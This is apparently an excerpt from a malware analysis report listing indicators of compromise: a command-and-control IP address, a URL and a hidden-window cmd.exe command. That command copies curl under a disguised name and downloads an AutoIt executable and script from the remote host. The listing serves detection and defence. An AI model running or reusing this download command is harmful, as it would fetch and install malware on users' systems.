Technical Information
- '5.##8.87.58':2351
- http://5.###.87.58:2351/oamujkrl via 5.##8.87.58
- '<SYSTEM32>\cmd.exe' /c mkdir c:\oamu & cd /d c:\oamu & copy <SYSTEM32>\curl.exe oamu.exe & oamu -H "User-Agent: curl" -o Autoit3.exe http://5.188.87.58:2351 & oamu -o ugvibn.au3 http://5.188.87.58:2351/msioamujkr...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c mkdir c:\oamu & cd /d c:\oamu & copy <SYSTEM32>\curl.exe oamu.exe & oamu -H "User-Agent: curl" -o Autoit3.exe http://5.188.87.58:2351 & oamu -o ugvibn.au3 http://5.188.87.58:2351/msioamujkr...